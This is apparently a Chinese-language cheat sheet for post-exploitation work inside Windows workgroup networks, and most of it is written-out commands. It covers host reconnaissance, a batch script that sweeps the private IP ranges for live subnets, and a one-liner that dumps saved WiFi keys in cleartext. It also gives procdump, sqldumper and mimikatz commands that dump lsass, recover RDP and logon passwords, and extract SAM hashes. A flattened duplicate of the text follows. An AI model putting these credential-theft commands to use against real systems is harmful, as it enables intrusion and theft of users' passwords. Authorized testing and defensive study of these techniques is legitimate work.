Windows工作组内网信息收集技术指南

一、基础信息收集命令

1. 用户与权限信息

whoami：查看当前用户及权限
net user：查看主机账号，为定制字典准备
quser：查看在线用户，注意管理员是否在线

2. 系统信息

systeminfo：查看系统信息及补丁情况，判断是否有域
hostname：查看当前主机名
tasklist /svc：查看安装的软件，判断杀软

3. 网络信息

ipconfig /all：查看IP信息，判断是否有域
netstat -nao：查看网络连接状态，判断IP段和出网限制端口
arp -a：查看内网有价值的ARP通信记录
route print：查看路由表

4. 凭证信息

cmdkey /l：查看当前保存的登录凭证，也能看到通信的IP

二、内网存活段探测

1. 批处理脚本探测

@echo off
rem 内网存活段自动发现脚本 [Windows]
rem By Klion
rem 2020.7.1
setlocal enabledelayedexpansion

for /l %%i in (0,1,255) do (
    for /l %%k in (0,1,255) do (
        ping -w 1 -n 1 10.%%i.%%k.1 | findstr "TTL=" >nul || ping -w 1 -n 1 10.%%i.%%k.254 | findstr "TTL=" >nul
        if !errorlevel! equ 0 (
            echo 10.%%i.%%k.0/24 is alive ! >> alive.txt
        ) else (
            echo 10.%%i.%%k.0/24 May be sleeping !
        )
    )
)

for /l %%s in (16,1,31) do (
    for /l %%d in (0,1,255) do (
        ping -n 1 -w 1 172.%%s.%%d.1 | findstr "TTL=" >nul || ping -w 1 -n 1 172.%%s.%%d.254 | findstr "TTL=" >nul
        if !errorlevel! equ 0 (
            echo 172.%%s.%%d.0/24 is alive ! >> alive.txt
        ) else (
            echo 172.%%s.%%d.0/24 May be sleeping !
        )
    )
)

for /l %%t in (0,1,255) do (
    ping -n 1 -w 1 192.168.%%t.1 | findstr "TTL=" >nul || ping -n 1 -w 1 192.168.%%t.254 | findstr "TTL=" >nul
    if !errorlevel! equ 0 (
        echo 192.168.%%t.0/24 is alive ! >> alive.txt
        ) else (
            echo 192.168.%%t.0/24 May be sleeping !
        )
    )
)

三、敏感信息收集

1. 最近文档记录

dir %APPDATA%\Microsoft\Windows\Recent：查看最近打开的文档

2. WiFi密码获取

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

3. 浏览器密码获取

使用moonD4rk师傅的项目获取浏览器保存的密码

四、凭证提取技术

1. RDP连接密码离线破解

查看是否存在凭证：

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

打包对应文件到本地，获取对应连接记录的guidMasterKey：

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz # dpapi::cred /in:<Credentials文件凭证路径>

本地加载lsass.dmp并获取对应的MasterKey：

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::dpapi

使用MasterKey解密：

mimikatz# dpapi::cred /in:<Credentials文件凭证路径> /masterkey:xxxxxxxx

2. Windows本地Hashdump方法

方法一：使用procdump

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

方法二：使用sqldumper

dir /s/a-d/b C:\*.sqldumper.exe
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do Sqldumper.exe %i 0 0x01100
sekurlsa::minidump SQLDmpr0001.mdmp
sekurlsa::logonPasswords full

方法三：SAM数据库提取

reg save hklm\sam .\sam.hive & reg save hklm\system .\system.hive
lsadump::sam /system:sys.hive /sam:sam.hive

五、常见系统配置文件

1. 常见OA系统

泛*OA
致*OA
通*OA
用*NC等

2. 用友NC解密

使用jas502n师傅的项目进行解密

3. 配置文件位置

通常需要查找.config文件
各种常见系统的配置文件地址需要记忆

六、渗透测试关键步骤

打点：寻找初始入侵点
提权/维权：获取和维持权限
信息收集：深入了解目标环境
反复执行：以上步骤反复进行直到达成目标

七、重要提示

渗透的本质是信息收集
目标主机信息收集的深度决定后渗透权限持续把控的能力
所有知识点都可以在网上搜索到，感谢各位师傅的分享

本指南总结了Windows工作组内网渗透中的关键信息收集技术，包括基础命令、内网探测、凭证提取和敏感信息获取等方法。这些技术在渗透测试的不同阶段都有重要作用，合理运用可以大大提高渗透效率。

Windows工作组内网信息收集技术指南一、基础信息收集命令 1. 用户与权限信息 whoami ：查看当前用户及权限 net user ：查看主机账号，为定制字典准备 quser ：查看在线用户，注意管理员是否在线 2. 系统信息 systeminfo ：查看系统信息及补丁情况，判断是否有域 hostname ：查看当前主机名 tasklist /svc ：查看安装的软件，判断杀软 3. 网络信息 ipconfig /all ：查看IP信息，判断是否有域 netstat -nao ：查看网络连接状态，判断IP段和出网限制端口 arp -a ：查看内网有价值的ARP通信记录 route print ：查看路由表 4. 凭证信息 cmdkey /l ：查看当前保存的登录凭证，也能看到通信的IP 二、内网存活段探测 1. 批处理脚本探测三、敏感信息收集 1. 最近文档记录 dir %APPDATA%\Microsoft\Windows\Recent ：查看最近打开的文档 2. WiFi密码获取 3. 浏览器密码获取使用moonD4rk师傅的项目获取浏览器保存的密码四、凭证提取技术 1. RDP连接密码离线破解查看是否存在凭证：打包对应文件到本地，获取对应连接记录的guidMasterKey：本地加载lsass.dmp并获取对应的MasterKey：使用MasterKey解密： 2. Windows本地Hashdump方法方法一：使用procdump 方法二：使用sqldumper 方法三：SAM数据库提取五、常见系统配置文件 1. 常见OA系统泛* OA 致* OA 通* OA 用* NC等 2. 用友NC解密使用jas502n师傅的项目进行解密 3. 配置文件位置通常需要查找.config文件各种常见系统的配置文件地址需要记忆六、渗透测试关键步骤打点：寻找初始入侵点提权/维权：获取和维持权限信息收集：深入了解目标环境反复执行：以上步骤反复进行直到达成目标七、重要提示渗透的本质是信息收集目标主机信息收集的深度决定后渗透权限持续把控的能力所有知识点都可以在网上搜索到，感谢各位师傅的分享本指南总结了Windows工作组内网渗透中的关键信息收集技术，包括基础命令、内网探测、凭证提取和敏感信息获取等方法。这些技术在渗透测试的不同阶段都有重要作用，合理运用可以大大提高渗透效率。